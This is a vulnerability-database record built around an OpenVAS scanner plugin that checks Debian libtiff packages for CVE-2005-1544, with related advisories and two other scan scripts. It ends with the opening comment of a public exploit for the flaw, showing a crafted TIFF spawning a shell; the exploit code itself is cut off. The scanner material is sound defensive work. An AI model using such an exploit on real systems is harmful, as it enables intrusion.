ID OPENVAS:54339 Type openvas Reporter Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com Modified 2017-07-07T00:00:00
Description
The remote host is missing an update to tiff
announced via advisory DSA 755-1.
Frank Warmerdam discovered a stack-based buffer overflow in libtiff,
the Tag Image File Format library for processing TIFF graphics files,
that can lead to the execution of arbitrary code via malformed TIFF
files.
For the old stable distribution (woody) this problem has been fixed in
version 3.5.5-7
# OpenVAS Vulnerability Test
# $Id: deb_755_1.nasl 6616 2017-07-07 12:10:49Z cfischer $
# Description: Auto-generated from advisory DSA 755-1
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Shared helper include. Nothing in this script calls it directly;
# presumably it provides version-comparison helpers -- confirm against the library.
include("revisions-lib.inc");
# Remediation text attached to the result as the "solution" tag.
# NOTE(review): this text names the fixed versions for sarge and sid only,
# while the check at the end of this script compares against the woody fix
# version (3.5.5-7) given in tag_summary. Operators reading the report should
# use the version that matches the scanned release.
tag_solution = "For the stable distribution (sarge) this problem has been fixed in
version 3.7.2-3.
For the unstable distribution (sid) this problem has been fixed in
version 3.7.2-3.
We recommend that you upgrade your libtiff packages.
https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20755-1";
# Summary text attached to the result as the "summary" tag: a stack-based
# buffer overflow in libtiff reachable through malformed TIFF files.
# The string is emitted at runtime as written, including its spelling.
tag_summary = "The remote host is missing an update to tiff
announced via advisory DSA 755-1.
Frank Warmerdam discovered a stack-based buffer overflow in libtiff,
the Tag Image File Format library for processing TIFF graphics files
that can lead to the executionof arbitrary code via malformed TIFF
files.
For the old stable distribution (woody) this problem has been fixed in
version 3.5.5-7";
# Metadata registration. When the scanner loads the script with `description`
# set, only this block runs: it declares the script's identity, references,
# scoring and prerequisites, then exits before any host is examined.
if(description)
{
# Numeric plugin ID and revision/date bookkeeping.
script_id(54339);
script_version("$Revision: 6616 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $");
script_tag(name:"creation_date", value:"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)");
# Cross-references for correlating this finding with other advisory sources.
script_bugtraq_id(13585);
script_cve_id("CVE-2005-1544");
# CVSS v2 base score and vector: network-reachable, low complexity, no
# authentication, partial impact on confidentiality, integrity and availability.
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Debian Security Advisory DSA 755-1 (tiff)");
# Information-gathering category: the check reads package data only.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com");
script_family("Debian Local Security Checks");
# Must run after gather-package-list.nasl, and only when both knowledge-base
# keys below are present. Presumably those keys are set by that dependency
# after an authenticated SSH login -- confirm. Without them this script is
# skipped, so an unauthenticated scan yields no result for this advisory
# rather than a "not vulnerable" verdict.
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
# The finding is derived from installed package versions, not from probing
# the library itself; remediation is a vendor-supplied package update.
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
# End of the description phase.
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-deb.inc");

# Check every binary package named by the advisory against the fixed version
# 3.5.5-7 for release "DEB3.0" (presumably Debian 3.0 "woody", matching the
# summary text -- confirm against pkg-lib-deb.inc). Only this release is
# evaluated here; hosts on other releases get no verdict from this script.
res = "";
report = "";
foreach pkg_name (make_list("libtiff-tools", "libtiff3g", "libtiff3g-dev")) {
  res = isdpkgvuln(pkg:pkg_name, ver:"3.5.5-7", rls:"DEB3.0");
  # Every non-NULL result is appended to the report.
  if (res != NULL) {
    report += res;
  }
}

if (report == "") {
  # Nothing was flagged. __pkg_match is not defined in this script; presumably
  # pkg-lib-deb.inc sets it when a listed package was found installed -- confirm.
  # When it is unset the script ends without reporting a verdict.
  if (__pkg_match) {
    exit(99); # Not vulnerable.
  }
} else {
  security_message(data:report);
}
{"id": "OPENVAS:54339", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 755-1 (tiff)", "description": "The remote host is missing an update to tiff\nannounced via advisory DSA 755-1.\n\nFrank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the executionof arbitrary code via malformed TIFF\nfiles.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7", "published": "2008-01-17T00:00:00", "modified": "2017-07-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=54339", "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2005-1544"], "lastseen": "2017-07-24T12:50:05", "viewCount": 1, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-07-24T12:50:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1544"]}, {"type": "nessus", "idList": ["MANDRAKE_MDKSA-2006-042.NASL", "FREEBSD_PKG_68222076010B11DABC080001020EED82.NASL", "DEBIAN_DSA-755.NASL", "GENTOO_GLSA-200505-07.NASL", "UBUNTU_USN-130-1.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:1554"]}, {"type": "gentoo", "idList": ["GLSA-200505-07"]}, {"type": "openvas", "idList": ["OPENVAS:54939", "OPENVAS:54465"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:8665"]}, {"type": "debian", "idList": ["DEBIAN:DSA-755-1:F11EF"]}, {"type": "osvdb", "idList": ["OSVDB:16350"]}, {"type": "ubuntu", "idList": ["USN-130-1"]}, {"type": "freebsd", "idList": ["68222076-010B-11DA-BC08-0001020EED82"]}], "modified": "2017-07-24T12:50:05", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "54339", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_755_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory 
DSA 755-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.7.2-3.\n\nWe recommend that you upgrade your libtiff packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20755-1\";\ntag_summary = \"The remote host is missing an update to tiff\nannounced via advisory DSA 755-1.\n\nFrank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the executionof arbitrary code via malformed TIFF\nfiles.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7\";\n\n\nif(description)\n{\n script_id(54339);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n 
script_bugtraq_id(13585);\n script_cve_id(\"CVE-2005-1544\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 755-1 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.5.5-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff3g\", ver:\"3.5.5-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff3g-dev\", ver:\"3.5.5-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Debian Local Security Checks"}
{"cve": [{"lastseen": "2020-10-03T11:34:54", "description": "Stack-based buffer overflow in libTIFF before 3.7.2 allows remote attackers to execute arbitrary code via a TIFF file with a malformed BitsPerSample tag.", "edition": 3, "cvss3": {}, "published": "2005-05-14T04:00:00", "title": "CVE-2005-1544", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-1544"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:libtiff:libtiff:3.6.1", "cpe:/a:libtiff:libtiff:3.5.1", "cpe:/a:libtiff:libtiff:3.5.4", "cpe:/a:libtiff:libtiff:3.4", "cpe:/a:libtiff:libtiff:3.6.0", "cpe:/a:libtiff:libtiff:3.7.1", "cpe:/a:libtiff:libtiff:3.7.0", "cpe:/a:libtiff:libtiff:3.5.3", "cpe:/a:libtiff:libtiff:3.5.7", "cpe:/a:libtiff:libtiff:3.5.6", "cpe:/a:libtiff:libtiff:3.5.2", "cpe:/a:libtiff:libtiff:3.5.5"], "id": "CVE-2005-1544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1544", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:libtiff:libtiff:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.7.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:libtiff:libtiff:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.5:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T19:35:27", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "Tavis Ormandy discovered a buffer overflow in the TIFF library. A \nmalicious image with an invalid \"bits per sample\" number could be \nconstructed which, when decoded, would have resulted in execution of \narbitrary code with the privileges of the process using the library.\n\nSince this library is used in many applications like \"ghostscript\" and \nthe \"CUPS\" printing system, this vulnerability may lead to remotely \ninduced privilege escalation.", "edition": 5, "modified": "2005-05-20T00:00:00", "published": "2005-05-20T00:00:00", "id": "USN-130-1", "href": "https://ubuntu.com/security/notices/USN-130-1", "title": "TIFF library vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:01", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "### Background\n\nlibTIFF provides support for reading and manipulating TIFF (Tag Image File Format) images. \n\n### Description\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered a stack based buffer overflow in the libTIFF library when reading a TIFF image with a malformed BitsPerSample tag. \n\n### Impact\n\nSuccessful exploitation would require the victim to open a specially crafted TIFF image, resulting in the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll libTIFF users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/tiff-3.7.2\"", "edition": 1, "modified": "2006-05-22T00:00:00", "published": "2005-05-10T00:00:00", "id": "GLSA-200505-07", "href": "https://security.gentoo.org/glsa/200505-07", "type": "gentoo", "title": "libTIFF: Buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2005-1544"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.remotesensing.org/libtiff/\nVendor Specific News/Changelog Entry: http://bugzilla.remotesensing.org/show_bug.cgi?id=843\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2006:042)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\nSecurity Tracker: 1013944\n[Secunia Advisory ID:15331](https://secuniaresearch.flexerasoftware.com/advisories/15331/)\n[Secunia Advisory ID:18289](https://secuniaresearch.flexerasoftware.com/advisories/18289/)\n[Secunia Advisory ID:15431](https://secuniaresearch.flexerasoftware.com/advisories/15431/)\n[Secunia Advisory ID:15629](https://secuniaresearch.flexerasoftware.com/advisories/15629/)\n[Secunia Advisory ID:16872](https://secuniaresearch.flexerasoftware.com/advisories/16872/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:18943](https://secuniaresearch.flexerasoftware.com/advisories/18943/)\n[Secunia Advisory ID:15320](https://secuniaresearch.flexerasoftware.com/advisories/15320/)\n[Secunia Advisory ID:16063](https://secuniaresearch.flexerasoftware.com/advisories/16063/)\nOther Advisory 
URL: http://security.gentoo.org/glsa/glsa-200505-07.xml\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.34/SCOSA-2005.34.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.3/SCOSA-2006.3.txt\nOther Advisory URL: http://www.ubuntulinux.org/support/documentation/usn/usn-130-1\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_14_sr.html\nOther Advisory URL: http://www.debian.org/security/2005/dsa-755\nKeyword: sr894564,fz532775,erg712889\nKeyword: SCOSA-2005.49\n[CVE-2005-1544](https://vulners.com/cve/CVE-2005-1544)\n", "modified": "2005-05-05T04:09:09", "published": "2005-05-05T04:09:09", "href": "https://vulners.com/osvdb/OSVDB:16350", "id": "OSVDB:16350", "type": "osvdb", "title": "LibTIFF BitsPerSample Tag Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-10-04T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:54465", "href": "http://plugins.openvas.org/nasl.php?oid=54465", "type": "openvas", "title": "FreeBSD Ports: tiff", "sourceData": "#\n#VID 68222076-010b-11da-bc08-0001020eed82\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n tiff\n linux-tiff\n pdflib\n pdflib-perl\n fractorama\n gdal\n iv\n ivtools\n ja-iv\n ja-libimg\n paraview\n\nCVE-2005-1544\nStack-based buffer overflow in libTIFF before 1.53 allows remote\nattackers to execute arbitrary code via a TIFF file with a malformed\nBitsPerSample tag.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://bugzilla.remotesensing.org/show_bug.cgi?id=843\nhttp://www.gentoo.org/security/en/glsa/glsa-200505-07.xml\nhttp://www.remotesensing.org/libtiff/v3.7.3.html\nhttp://www.vuxml.org/freebsd/68222076-010b-11da-bc08-0001020eed82.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(54465);\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(13585);\n script_cve_id(\"CVE-2005-1544\");\n 
script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: tiff\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"tiff\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.7.3\")<0) {\n txt += 'Package tiff version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-tiff\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6.1_3\")<0) {\n txt += 'Package linux-tiff version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"pdflib\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.1_2\")<0) {\n txt += 'Package pdflib version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"pdflib-perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.1_2\")<0) {\n txt += 'Package pdflib-perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"fractorama\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package fractorama version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"gdal\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package gdal 
version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"iv\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package iv version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ivtools\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package ivtools version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-iv\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package ja-iv version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-libimg\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package ja-libimg version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"paraview\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package paraview version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200505-07.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54939", "href": "http://plugins.openvas.org/nasl.php?oid=54939", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200505-07 (tiff)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The libTIFF library is vulnerable to a buffer overflow, potentially\nresulting in the execution of arbitrary code.\";\ntag_solution = \"All libTIFF users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/tiff-3.7.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200505-07\nhttp://bugs.gentoo.org/show_bug.cgi?id=91584\nhttp://bugzilla.remotesensing.org/show_bug.cgi?id=843\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200505-07.\";\n\n \n\nif(description)\n{\n script_id(54939);\n script_cve_id(\"CVE-2005-1544\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200505-07 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright 
(c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/tiff\", unaffected: make_list(\"ge 3.7.2\"), vulnerable: make_list(\"lt 3.7.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:26:00", "description": "LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit. CVE-2005-1544. 
Local exploits for multiple platform", "published": "2006-03-05T00:00:00", "type": "exploitdb", "title": "LibTiff 3.7.1 BitsPerSample Tag Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1544"], "modified": "2006-03-05T00:00:00", "id": "EDB-ID:1554", "href": "https://www.exploit-db.com/exploits/1554/", "sourceData": "/*\n LibTIFF exploit\n Tested on LibTIFF 3.7.1\n Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat\n\n Blog: http://gruba.blogspot.com\n \n In other versions and/or Linux distributions you might need to\n adjust some offsets.\n\n gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit\n cc libtiff_exploit.c -o libtiff_exploit\n gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff\n Using RET: 0xbfffffb4\n TIFFReadDirectory:\n Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.\n evil.tiff:\n Warning, incorrect count for field \"PhotometricInterpretation\" (150341633, expecting 1); tag trimmed.\n evil.tiff:\n Warning, incorrect count for field \"BitsPerSample\" (257, expecting 1); tag trimmed.\n sh-3.00$\n\n gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit\n /usr/kde/3.3/bin/konqueror evil.tiff\n Linux Enabled\n Using RET: 0xbfffffb1\n konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider\n konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider\n TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.\n : Warning, incorrect count for field \"PhotometricInterpretation\" (150341633, expecting 1);\n tag\n trimmed.\n : Warning, incorrect count for field \"BitsPerSample\" (257, expecting 1); tag trimmed.\n sh-3.00$ exit\n exit\n\n Heheh it also works like a remote exploit i would leave that work (easy work) for the\n \"interested\" people.\n\n*/\n\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n#include 
